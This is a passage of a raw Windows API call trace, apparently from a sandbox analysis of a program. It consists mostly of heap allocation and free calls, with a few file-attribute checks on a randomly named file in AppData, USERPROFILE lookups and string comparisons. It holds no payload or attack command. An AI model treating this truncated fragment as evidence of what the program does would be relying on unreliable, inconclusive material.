[0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0150.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0150.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a68440 [0150.183] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/s4dSYQJ4.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\s4dSYQJ4.xlsx", lpFilePart=0x8cf650*="s4dSYQJ4.xlsx") returned 0x2d [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0150.183] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\s4dSYQJ4.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\s4dsyqj4.xlsx")) returned 0xffffffff [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.183] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0150.183] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.184] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Skype", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0150.184] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0150.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0150.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0150.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0150.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0150.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.189] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0150.189] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0150.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0150.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0150.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0150.189] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0150.190] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0150.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0150.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0150.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0150.191] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.191] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0150.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0150.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0150.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0150.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0150.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0150.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0150.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 